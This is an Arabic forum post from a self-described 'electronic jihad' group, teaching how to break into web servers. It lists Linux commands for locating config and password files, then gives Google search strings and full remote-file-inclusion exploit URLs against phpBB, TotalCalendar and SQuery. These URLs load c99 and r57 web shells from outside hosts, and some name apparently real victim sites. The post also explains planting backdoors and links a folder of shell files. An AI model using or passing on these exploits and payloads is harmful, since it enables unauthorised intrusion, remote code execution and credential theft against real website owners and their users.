Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: حصريا على منتدى صقر غامد


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
حصريا على منتدى صقر غامد
Permalink   
 


[center]ان اختراق السيرفرات اهم بكثير من اختراق المنتديات فاختراق السيرفرات فيه مواقع كثيره
طيب بيسال واحد كيف اخترق السيرفر ووين الثغرات.................................. سنباد بثغرات اللى تسطيع من
خلاله رفع شل او ايجاد شل الموقع نفسه ولكن قبل ذلك نعرص لكم اهم اوامر الشل ومعناها وليس فقط النسخ اللصق
ياخي العزيز اللينكس سهل ولكن تم تضخيمه بقصد وبغير قصد ولكن والله سهل نبدا الاوامر
1-find / -name config.php
طيب انا ابغى افهم الامر هذا مش لاجل بس نسخ لصق بل افهم وش معناه
معنى الامر ايجاد الملفات اللى فيه كونفق مثل مجلات النيوك والمنتديات وغيرها ومراكز التحميل
2-ls /var/named
is لعرض محتويات المجلد في نظاما ما
var من فريشين اي منوع مواقع منوعه
اي معنى الامر عرض كل مافي السيرفر من مواقع
3-cat لعرض محتو مجلدات
4- home للمجلد الاصلى في السيرفر
5-pwd و is تعمل نفس العمل تعرض محتوى السيرفر ومكان تواجدك
6-chmod : لتغير تصريح دخول ملف معين ففي بعض الملفات لاتقبل فقط الا القراءه لكن مع تغير تصريحه الى 777 يقبل
7-passwd : لانشاء كملة سر او تغيره لانشاء كلمه السر او ايجاده
طيب اخذنا فكره عامه على ماتعني ما1ذا يهمني من الاوامر
في حاله اني ابغى اخترق السيرفر بسرعه اكتب الامر الاتي
find / -name service.pwd
service.pwd يعني مكان تواجد الباسورد المشفر
8-cat /etc/passwd وهو لمعرفة كل الـيوزر والمواقع والمسارات على السيرفر
طيب انا الان عرفت اوامر الشل ابغى ثغرات توصلني الى شل الموقع او ارفع الملف

اول ثغره ......................................... بسم الله
للبحث في جوجل أو الـياهو أو أي محرك بحث آخر :
اكتب :
"Powered by phpBB" inurl:activity.php
---------------------------------------------------------
الإسمتثمار :
http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=http://yoursite.com/script.txt
http://www.conservativelife.com/boards/language/lang_english/lang_activity.php?phpbb_root_path=http%3A%2F%2Fwww .members.lycos.co.uk%2Fbourair%2Fc99.txt%3FID&act= ls&d=%2Fhome%2Fcdsmith%2Fpublic_html%2F&sort=0a
وهذا هديه من خوكم صقر غامد
الثغره الثانيه........................................... .......................

"Powered by TotalCalendar"
راح يطلع معك مواقع كتير
نختار منهم واحد مثلا هذا http://www.pantherpta.org/
اضع خلفة مباشرة هذا الكود index.php?inc_dir=http://rst.void.ru/download/r57shell.txt?&ls%20-laF
ليصبح هكذا
http://www.pantherpta.org/index.php?...txt?&ls%20-laF
الثغره الثالثه........................................... .................................................. ...
اول شي اول شي نروح للقوقل
www.GoOgLe.CoM
ونبحث عن :
كود:
SQuery 4.5
راح نلاقي مواقع كتيرة (( نصهم سكروا الثغرة ورة يومين من اكتشافها معليش ))
بس انا جبتلكم موقع للتجربة
http://www.ucsserver.com
المهم حتقولي كيف نستثمر الثغرة ؟؟
حقولك بعد رابط الموقع تضيف
كود:
SQuery/lib/armygame.php?libpath=http://members.lycos.co.uk/dmarhackerz /ss.txt?
مع تغير ال http://members.lycos.co.uk/dmarhackerz/ss.txt
الى رابط الشيل تبعك بس لازم يكون امتداد الشيل txt
يعني مثال :
عندي شيل c99.php
روح نشيل .php
ونحط
كود:
.txt
وترفعه على موقعك وحطها برابط الاستغلال
ملاحطة مهمة ((( بعد رابط الشيل تبعك لازم تحط علامة ؟ )))
اوا فكره اني اخترق السيرفر كله بمواقعه اولا لازم ترفع باكدور الى السيرفر وكل
باكدور له بورت معين مثل الباكدور الايراني له بورت 2121 طيب مافائده الباكدرو
هو يجعلك متخفى وكذلك يعطيك صلاحياتك وصلاحيات اوسع
طيب وبعدين ماذا تفعل ..................................... تنزل برنامج النت كات للتنصت


الدرس القادم سيكون عن النت كات واستخدامه بالصور بس قبل مانروح نعطيكم بعص ملفات الشل
http://members.lycos.co.uk/asheqalbeer/up/
 


__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard